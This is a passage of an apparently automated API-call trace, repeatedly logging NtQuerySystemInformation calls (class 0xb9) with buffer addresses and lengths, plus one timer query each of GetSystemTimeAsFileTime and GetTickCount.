Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf50 | out: lpSystemTimeAsFileTime=0xf7a68fcf50*(dwLowDateTime=0x35117c18, dwHighDateTime=0x1d63874)) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf40, Length=0x28, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0272.975] GetTickCount () returned 0x118464e [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0272.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0272.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x20, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] 